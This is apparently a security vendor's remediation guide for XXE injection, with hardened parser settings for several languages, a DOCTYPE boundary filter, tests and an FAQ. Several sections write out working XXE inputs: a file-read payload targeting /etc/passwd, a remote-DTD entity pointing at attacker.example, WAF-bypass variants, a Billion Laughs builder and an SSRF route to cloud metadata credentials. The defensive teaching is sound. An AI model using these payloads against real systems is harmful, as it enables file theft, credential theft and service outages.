AuditCore
high · CWE-611 · OWASP A05:2021 · XML External Entity Injection

How to fix XXE injection

XXE (XML External Entity) injection happens when an XML parser processes external entities embedded in user-supplied XML. Attackers use it to read server files, perform SSRF, exfiltrate data via DNS, and crash services. The fix is a few lines of parser configuration, but the lines differ for every parser, and several widely used parsers (or older versions of them) ship with DANGEROUS defaults.

What is XXE?

XML supports a feature called external entities — placeholders that reference external resources during parsing. The original use case was reusable content (citation databases, glossary terms). The exploitable case: an attacker submits XML with an entity that points to file:///etc/passwd or http://internal-service. When the parser resolves the entity, it reads the file or makes the HTTP request — and includes the result in the parsed XML. The attacker gets the response back.
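As a rough illustration of the mechanics, the sketch below builds the classic file-read document and hands it to Python's standard-library xml.etree.ElementTree. That parser does not expand external entities and raises ParseError when it meets one, which is the behavior you want from every parser in your stack. The payload text and the try_parse helper are illustrative names, not part of any library.

```python
import xml.etree.ElementTree as ET

# Classic in-band XXE document: the DOCTYPE declares an external entity
# named "xxe", and the body references it as &xxe;.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    "<foo>&xxe;</foo>"
)


def try_parse(xml_text: str) -> str:
    """Return the root element's text, or a marker if the parser refused."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return root.text or ""


result = try_parse(XXE_PAYLOAD)
print(result)
```

A vulnerable parser would instead return the file's contents as the text of the foo element, which is exactly what the attacker reads back.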

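XXE has been known since 2002 but persists because many XML parser libraries have shipped with external entity processing ENABLED by default. Java's JAXP still does. Older .NET Framework targets (XmlDocument and XmlTextReader before 4.5.2), PHP builds linked against libxml2 older than 2.9.0, and lxml before 5.0 (which resolves entities by default, although it blocks network access) are also exposed, and any libxml2 binding (lxml, Nokogiri, libxmljs) becomes vulnerable once entity substitution is switched on. To use XML safely, explicitly disable external entities rather than relying on the defaults of whichever version you happen to run.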

The vulnerability surface is wider than 'an XML endpoint'. SVG files (which are XML), DOCX/XLSX/PPTX (zipped XML), SOAP services, RSS/Atom feeds, SAML responses, OAuth flows that accept SAML, image upload endpoints, e-signature workflows, document conversion services — all process XML somewhere in the pipeline. Many breaches happen at unexpected XML touchpoints (attacker uploads malicious .docx → the document conversion library hits XXE → server filesystem leaks).

Beyond file read, XXE escalates to SSRF (entities pointing to internal HTTP services, including AWS metadata 169.254.169.254), out-of-band data exfiltration via DNS or HTTP callbacks, and Billion Laughs / exponential entity expansion DoS attacks. A single XXE vulnerability can be the entry point to full cloud compromise — read EC2 metadata, get the IAM role's temporary credentials, escalate from there.

What an attacker can do

The concrete impact of leaving XXE unpatched.

Server filesystem read (file:// protocol)

Read /etc/passwd, /etc/shadow (if running as root), AWS credentials in ~/.aws/credentials, Kubernetes serviceaccount tokens, app .env files, source code.

SSRF to internal services

Entities pointing to http://localhost or internal IPs hit services not exposed publicly. Pivot to admin panels, internal APIs, databases.

Cloud metadata service compromise

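On AWS, read http://169.254.169.254/latest/meta-data/iam/security-credentials/<role> to get the instance role's temporary credentials. The attacker then holds whatever permissions that role has. Instances that enforce IMDSv2 are much harder to hit this way, because IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue.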

Out-of-band data exfiltration

Even when responses are blind (no XML output returned), entities can trigger DNS lookups or HTTP requests to attacker-controlled servers, leaking data via the URL.

DoS via entity expansion (Billion Laughs)

Nested entity definitions cause exponential memory growth: under 1 KB of XML balloons into multiple GB during parsing. This crashes service workers and triggers OOM kills.
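The arithmetic behind that growth can be sketched in a few lines of Python. The function names and the default of nine levels with a fan-out of ten are assumptions chosen to match the classic payload; the code only builds the document and computes sizes, it never parses it.

```python
def billion_laughs(levels: int = 9, fanout: int = 10, seed: str = "lol") -> str:
    """Build the nested-entity document; each level repeats the previous entity `fanout` times."""
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE lolz [", f' <!ENTITY lol "{seed}">']
    previous = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        body = f"&{previous};" * fanout
        lines.append(f' <!ENTITY {name} "{body}">')
        previous = name
    lines += ["]>", f"<lolz>&{previous};</lolz>"]
    return "\n".join(lines)


def expanded_length(levels: int = 9, fanout: int = 10, seed: str = "lol") -> int:
    """Characters produced if a parser expands the final entity without any limit."""
    return len(seed) * fanout ** levels


payload = billion_laughs()
print(len(payload))       # size of the document on the wire, in characters
print(expanded_length())  # size after unlimited expansion
```

With these defaults the document stays under 1 KB, while unlimited expansion yields 3 × 10^9 characters. Each extra level multiplies the result by the fan-out, which is why parsers need a hard expansion cap rather than a size limit on the input.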

Pivot to RCE in misconfigured stacks

Java with deserialization in classpath, PHP with phar:// protocol, .NET with object factory entities — XXE escalates to remote code execution in specific configurations.

How do I know if I'm vulnerable?

Manual: any endpoint that accepts XML, SOAP, SAML, RSS, SVG upload, DOCX/XLSX upload, or document conversion is a candidate. Send a payload with <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>. If the response contains the contents of /etc/passwd or hints of them (root:x:0:0:root in the parsed output, an error mentioning the file), you have XXE. Also try out-of-band: declare an entity pointing to http://your-burp-collaborator-url and watch for incoming requests.

Automated: AuditCore's XXE scanner runs on Pro and Business tiers. We send 8 payload variants: file://, http://internal, http://169.254.169.254 (AWS metadata), DTD-based out-of-band, parameter entities, billion laughs, gopher://, and PHP filter wrappers. We catch both inline (response includes leaked data) and blind XXE (DNS callback to our infrastructure). Free Trial covers basic XML endpoints on the homepage.

Code review pattern: search your codebase for XML parser instantiations. In Python: lxml.etree.parse, ElementTree.parse, xml.dom.minidom.parseString. In Java: DocumentBuilderFactory.newInstance, SAXParserFactory.newInstance, XMLReaderFactory.createXMLReader. In Node: xml2js, fast-xml-parser, libxmljs. In PHP: simplexml_load_string, DOMDocument::loadXML. Each instantiation needs explicit configuration to disable external entities — Step 1 below shows the patterns per parser.

How to fix XXE

Six steps. Steps 1 to 5 apply the same fix to different parsers, so use the ones that match your stack; step 6 adds a boundary check on top.

  1. Disable external entity resolution at the parser level

    The single most effective fix. Configure your XML parser to refuse external entities — every parser supports this, but each uses different syntax.

    This is the canonical fix. Disable DTD loading, parameter entities, and external general entities at parser construction. Also disable network access if your parser exposes that toggle. The exact API varies per language; steps 1 to 5 cover lxml, JAXP, .NET, PHP, and Node.js in turn.

    Python / lxml (Step 1)
    from lxml import etree
    
    # VULNERABLE on lxml < 5.0: resolve_entities defaults to True
    parser = etree.XMLParser()
    
    # SECURE: set every option explicitly instead of relying on version defaults
    parser = etree.XMLParser(
        resolve_entities=False,  # disable entity resolution
        no_network=True,         # block all network access
        dtd_validation=False,    # disable DTD validation
        load_dtd=False,          # don't fetch DTD
        huge_tree=False,         # keep libxml2's built-in size limits (billion laughs defense)
    )
    tree = etree.parse(xml_file, parser)
  2. Same fix in Java JAXP / DocumentBuilderFactory

    Java's standard XML APIs are XXE-vulnerable by default. JAXP, SAX, DOM, and StAX all need explicit hardening at every parser instantiation in your codebase.

    Java's XML stack (JAXP) ships with external entities ON by default and the OWASP-recommended settings list is long. Use a centralized helper that applies all hardenings at once and use that helper EVERYWHERE you parse XML. Audit every DocumentBuilderFactory.newInstance() in your codebase.

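    Java (Step 2)
    import javax.xml.parsers.DocumentBuilder;
    import javax.xml.parsers.DocumentBuilderFactory;
    import org.w3c.dom.Document;
    
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();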
    
    // Disable DTDs entirely (best defense)
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // Belt and suspenders if DTDs can't be disabled:
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
    
    DocumentBuilder builder = dbf.newDocumentBuilder();
    Document doc = builder.parse(xmlInput);
  3. Same fix in .NET XmlReader / XmlDocument

    .NET Framework's XmlDocument and XmlTextReader were XXE-vulnerable by default before 4.5.2, and lots of legacy code is still on older targets. Set DtdProcessing.Prohibit and a null XmlResolver.

    Modern .NET (4.5.2+) defaults to safe behavior, but legacy apps or code paths instantiating XmlReader/XmlDocument with custom settings often regress. Set DtdProcessing = DtdProcessing.Prohibit and an explicit null XmlResolver to block external resolution.

    C# / .NET (Step 3)
    using System.Xml;
    
    // XmlReader (preferred: explicit and modern)
    var settings = new XmlReaderSettings {
        DtdProcessing = DtdProcessing.Prohibit, // block DTDs entirely
        XmlResolver = null,                     // refuse external resolution
    };
    using (var reader = XmlReader.Create(stream, settings)) {
        // safe parsing
    }
    
    // XmlDocument (legacy — also safe with these settings)
    var doc = new XmlDocument {
        XmlResolver = null,
    };
    doc.Load(xmlInput);
  4. Disable XXE in PHP libxml-based parsers

    PHP's DOMDocument, SimpleXML, and XMLReader all use libxml2. Whether external entities load by default depends on the libxml2 version: 2.9.0 and later do not load them unless asked. PHP 8.0 requires libxml2 2.9.0 or newer and deprecates libxml_disable_entity_loader, which legacy code often still calls.

    On PHP 8+, libxml defaults are XXE-safe. On older PHP, you NEED libxml_disable_entity_loader(true) before parsing. PHP 8 deprecated that function (because the default is now safe), so if you support older PHP, keep the call behind a version check. Despite its name, the LIBXML_NOENT flag ENABLES entity substitution; never pass it for untrusted input. LIBXML_DTDLOAD is also risky because it makes libxml2 fetch the external DTD subset.

    PHP (Step 4)
    <?php
    // PHP 8.0+: libxml2 does not load external entities by default.
    // PHP < 8.0: disable the entity loader explicitly.
    if (PHP_MAJOR_VERSION < 8) {
        libxml_disable_entity_loader(true);
    }
    
    $doc = new DOMDocument();
    // Never pass LIBXML_NOENT (it ENABLES entity substitution) or
    // LIBXML_DTDLOAD (it fetches the external DTD subset).
    // LIBXML_NONET additionally forbids network access while parsing.
    $doc->loadXML($xmlInput, LIBXML_NONET);
  5. Disable XXE in Node.js XML libraries

    Node lacks a built-in XML parser, so projects pull in xml2js, fast-xml-parser, libxmljs, sax. Each has its own XXE story — most are safe by default but check.

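    xml2js: doesn't process external entities by default, so it is safe. fast-xml-parser: never fetches external resources; its processEntities option only expands the predefined entities and those declared inline in the DOCTYPE. libxmljs (which wraps libxml2): exposes libxml2's parser flags directly, and noent: true is the switch that turns on entity substitution and with it XXE; pass noent: false and nonet: true explicitly rather than trusting defaults. sax-js: doesn't process external entities, so it is safe. The takeaway: stick to xml2js or fast-xml-parser; if you need libxmljs, harden it.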

    Node.js / libxmljs (Step 5)
    const libxmljs = require('libxmljs');
    
    // VULNERABLE: noent: true makes libxml2 substitute entities, external ones included
    const unsafeDoc = libxmljs.parseXml(xmlInput, { noent: true });
    
    // SECURE: set the flags explicitly (libxmljs option names are lowercase;
    // confirm them against the version you ship)
    const safeDoc = libxmljs.parseXml(xmlInput, {
      noent: false,    // do NOT replace entities
      nonet: true,     // disable network access for entity resolution
      dtdload: false,  // do NOT fetch DTDs
      dtdvalid: false, // do NOT validate against DTD
      doctype: false,  // keep the external subset unloaded; this does NOT reject DOCTYPE (see step 6)
    });
  6. Block XXE at upload boundary: reject XML containing DOCTYPE

    Defense in depth. If your endpoint receives uploaded XML/SVG/DOCX, scan for <!DOCTYPE before parsing. Reject anything containing it.

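    Most XML exchanged by modern APIs doesn't contain DOCTYPE declarations, so rejecting them costs little; the main exceptions are XHTML and SVG files exported by some editors, which you can handle separately. Scanning the raw byte stream for <!DOCTYPE BEFORE parsing catches XXE attempts at the boundary, even if a parser somewhere downstream is misconfigured. For zipped formats such as DOCX, scan each XML part after unzipping, since the marker is usually not visible in the compressed bytes. This is belt-and-suspenders defense: always pair it with step 1.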

    TypeScript (Step 6)
    function rejectIfXxeAttempt(xml: string): void {
      // Strip BOM and whitespace before checking
      const trimmed = xml.replace(/^\uFEFF?\s*/, '');
    
      if (/<!DOCTYPE/i.test(trimmed)) {
        throw new Error('XML containing DOCTYPE declarations is not accepted');
      }
      if (/<!ENTITY/i.test(trimmed)) {
        throw new Error('XML containing ENTITY declarations is not accepted');
      }
    }
    
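    // In your handler (assumes req.body is the raw XML string, e.g. via express.text())
    app.post('/api/import/xml', async (req, res) => {
      try {
        rejectIfXxeAttempt(req.body); // boundary check
      } catch (err) {
        return res.status(400).json({ error: (err as Error).message });
      }
      const parsed = safeParser.parseString(req.body); // hardened parser too
      res.json(parsed);
    });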
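The TypeScript check in step 6 works on a string body. Zipped formats such as DOCX, XLSX, and PPTX need one more step, because their XML parts only become visible after unzipping. The following is a minimal Python sketch of that idea using the standard library only. The function names and the MAX_PART_BYTES cap are assumptions made for this example, and the NUL-stripping trick only covers UTF-16 and UTF-32 encoded markers, not every possible encoding.

```python
import io
import re
import zipfile

DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
MAX_PART_BYTES = 10 * 1024 * 1024  # hypothetical per-part cap; tune for your uploads


def contains_dtd(xml_bytes: bytes) -> bool:
    """True if the raw bytes contain a DOCTYPE or ENTITY declaration."""
    # UTF-16/UTF-32 interleave NUL bytes with ASCII characters, so strip them first.
    stripped = xml_bytes.replace(b"\x00", b"")
    return DTD_MARKERS.search(stripped) is not None


def should_reject_office_upload(upload: bytes) -> bool:
    """Scan every XML part of a zipped office document before any parser sees it."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(upload))
    except zipfile.BadZipFile:
        return True  # not a valid container at all
    with archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_PART_BYTES:
                return True  # refuse oversized parts instead of reading them
            if contains_dtd(archive.read(info)):
                return True
    return False
```

As with the string check, this is a boundary filter only; the parser that eventually reads the parts still needs the hardening from the earlier steps.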

How to verify the fix

Manual: send a request to your XML endpoint containing the canonical OOB-XXE payload pointing to a webhook you control (e.g. webhook.site). If you see ANY incoming request to that webhook after submission, your parser is fetching external entities — XXE confirmed. Repeat with file:// payload pointing to /etc/passwd; if the response contains 'root:x:0:0:' you have file-read XXE.

Automated: AuditCore's XXE scanner (Pro/Business) runs 8 payload variants and confirms findings via inline output OR out-of-band callbacks to our infrastructure. Findings include the exact payload, the parser-leak detected, and language-specific fix prompts.

Long-term: add a unit test for every XML-accepting endpoint that submits a DOCTYPE-containing payload and asserts a 400 response (blocked at boundary) or empty parsing result (parser ignored entities). Run on every PR. Pair with quarterly re-audits to catch the case where someone bumps a parser library and the new version flipped a default.
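A regression test along those lines might look like the sketch below, written with Python's unittest. The handle_xml_request function is a hypothetical stand-in for your real endpoint (it returns a status code and the parsed text); in practice you would call the endpoint through your framework's test client instead.

```python
import unittest
import xml.etree.ElementTree as ET


def handle_xml_request(body: str):
    """Hypothetical stand-in for an XML endpoint: returns (status_code, parsed_text)."""
    if "<!DOCTYPE" in body.upper():
        return 400, None  # blocked at the boundary
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return 400, None
    return 200, root.text


class XxeRegressionTest(unittest.TestCase):
    PAYLOADS = [
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext;]><foo/>',
    ]

    def test_doctype_payloads_are_rejected(self):
        for payload in self.PAYLOADS:
            with self.subTest(payload=payload):
                status, parsed = handle_xml_request(payload)
                self.assertEqual(status, 400)
                self.assertIsNone(parsed)

    def test_plain_xml_still_works(self):
        self.assertEqual(handle_xml_request("<foo>ok</foo>"), (200, "ok"))
```

Run it with python -m unittest on every PR. The second test matters as much as the first: it catches a fix that blocks XXE by breaking legitimate XML.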

Frequently asked questions

Why does XXE still happen in 2026?

Three reasons. (1) Several widely deployed parsers ship, or shipped for years, with UNSAFE defaults: Java JAXP, lxml before 5.0, older .NET Framework targets, PHP on old libxml2. (2) Developers don't realize they're parsing XML: DOCX/XLSX uploads, SAML responses, and document conversion services all contain XML somewhere. (3) Code review misses it because the fix is at the parser instantiation, not in the obvious 'XML handling' code.

Is JSON safe from XXE?

JSON itself has no concept of external entities, so plain JSON is XXE-immune. But many APIs accept BOTH JSON and XML on the same endpoint (Content-Type negotiation). If yours does, the XML path needs the same hardening. Also: some 'JSON' formats embed XML (like SOAP-over-JSON or XML-in-stringfield), and that XML still hits an XML parser.

What about SVG uploads: are those XXE-vulnerable?

SVG is XML, so yes. Image processing libraries (ImageMagick, librsvg, sharp) invoke an XML parser to read SVG. ImageMagick's 'ImageTragick' bugs (CVE-2016-3714 and related CVEs) were command injection, SSRF, and file read through its SVG and MVG handling rather than XXE proper, but they show how much damage an uploaded vector image can do. If you accept SVG uploads, sanitize them with a DOMPurify-style allowlist or convert to PNG before storing.

Does a WAF block XXE attacks?

WAFs catch the obvious payloads (SYSTEM "file://...") but can be bypassed with parameter entities, remote DTD inclusion, and encoded payloads. Treat a WAF as defense in depth, not the fix. The fix is parser configuration.
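To see why signature matching is brittle, consider this small Python sketch. NAIVE_SIGNATURE is a deliberately simplistic pattern invented for the example, not any real WAF's rule set, and attacker.example is a placeholder host. Each variant declares an external entity that an unhardened parser could still resolve, yet none contains the literal text the signature looks for.

```python
import re

# Deliberately naive signature, invented for this example.
NAIVE_SIGNATURE = re.compile(rb'SYSTEM\s+"file://', re.IGNORECASE)

CANONICAL = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

BYPASSES = {
    # Same payload with single quotes around the system identifier.
    "single quotes": b"<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>",
    # Parameter entity that pulls the real payload from a remote DTD.
    "remote DTD": b'<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext;]><foo/>',
    # Canonical payload re-encoded as UTF-16 (BOM included), which parsers can auto-detect.
    "UTF-16": CANONICAL.decode("ascii").encode("utf-16"),
}


def is_blocked(body: bytes) -> bool:
    """True if the naive signature matches the request body."""
    return NAIVE_SIGNATURE.search(body) is not None


blocked = {name: is_blocked(body) for name, body in BYPASSES.items()}
print(is_blocked(CANONICAL), blocked)
```

Real rule sets are more thorough than one regex, but the same cat-and-mouse applies, which is why the parser has to be the component that refuses.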

What's the difference between in-band and out-of-band XXE?

In-band XXE: the parser includes the leaked data in the response, attacker reads it directly. Out-of-band (OOB): no direct response, but the parser triggers a DNS lookup or HTTP request to attacker-controlled infrastructure, leaking data via the URL or hostname. OOB XXE works against blind endpoints (e.g. document conversion services where you only get a success/failure response).

How does XXE pivot to SSRF and cloud metadata?

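External entities can use http:// (or https://) URLs. Point the entity to http://169.254.169.254/latest/meta-data/iam/security-credentials/<role> on EC2 and the parser fetches that URL, placing the role's temporary credentials in the entity replacement text. The attacker reads the credentials from the parsed XML and inherits whatever the role is allowed to do. This works against instances that still allow IMDSv1; IMDSv2 requires a token obtained via a PUT request, and the GCP and Azure metadata services require a custom request header, neither of which a plain entity fetch can supply.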
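When triaging rejected payloads in logs, it can help to see at a glance what each entity was aiming at. The sketch below is one possible way to do that in Python: it pulls SYSTEM identifiers out of a document with a regular expression and classifies each target using the standard ipaddress module. The function names and category labels are invented for this example, and a regex is only a rough extractor, not a substitute for parser hardening.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Matches general and parameter entity declarations with a SYSTEM identifier.
SYSTEM_ID = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+SYSTEM\s+["']([^"']+)["']""",
    re.IGNORECASE,
)


def entity_targets(xml_text: str) -> list:
    """Return every SYSTEM identifier declared in the document."""
    return SYSTEM_ID.findall(xml_text)


def classify_target(url: str) -> str:
    """Label a target as local file, metadata range, internal network, or other."""
    parsed = urlparse(url)
    if parsed.scheme == "file":
        return "local-file"
    host = parsed.hostname or ""
    if host == "localhost":
        return "internal-network"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return "hostname (resolve before trusting)"
    if address.is_link_local:  # 169.254.0.0/16 includes the metadata address
        return "link-local (cloud metadata range)"
    if address.is_loopback or address.is_private:
        return "internal-network"
    return "external"
```

For the EC2 example above, classify_target returns the link-local label, since 169.254.169.254 sits in 169.254.0.0/16.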

Is the Billion Laughs attack still real?

Yes, on parsers without entity-expansion limits. The classic payload defines &lol; as "lol", &lol1; as ten copies of &lol;, &lol2; as ten copies of &lol1;, and so on through &lol9;. The document is under 1 KB but expands to a billion copies of "lol" (about 3 GB) in memory, OOM-killing the worker. Modern parsers (recent libxml2, JAXP secure-processing) cap entity expansion. Always disable DTDs entirely if you don't need them; Step 2 above shows the exact JAXP feature flag.

Should I use a JSON-only API to avoid XXE entirely?

If your domain doesn't require XML, yes — use JSON exclusively and never expose XML parsing. If you need XML interoperability (SOAP integrations, SAML, legacy partner APIs), you can't avoid XML — but you can quarantine it: a single hardened parser module that handles all XML, with everything else operating on already-parsed data. Reduces the audit surface dramatically.
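One way to picture that quarantine is a single small module that owns all XML parsing and hands plain data to the rest of the application. The sketch below uses only Python's standard library; the module layout, the UnsafeXmlError class, and the function names are assumptions for illustration, and a real module would wrap whichever hardened parser your stack uses.

```python
import re
import xml.etree.ElementTree as ET

_DTD_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


class UnsafeXmlError(ValueError):
    """Raised when input is rejected before or during parsing."""


def parse_untrusted(xml_text: str) -> ET.Element:
    """The only function in the codebase allowed to parse untrusted XML."""
    if _DTD_MARKERS.search(xml_text):
        raise UnsafeXmlError("DOCTYPE/ENTITY declarations are not accepted")
    try:
        return ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise UnsafeXmlError(f"malformed XML: {exc}") from exc


def to_plain_dict(element: ET.Element) -> dict:
    """Convert a parsed element into plain data so callers never touch the parser."""
    return {
        "tag": element.tag,
        "attrib": dict(element.attrib),
        "text": (element.text or "").strip(),
        "children": [to_plain_dict(child) for child in element],
    }
```

Callers would use to_plain_dict(parse_untrusted(body)) and nothing else, so a code search for other parser imports becomes a quick way to spot code that bypasses the module.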
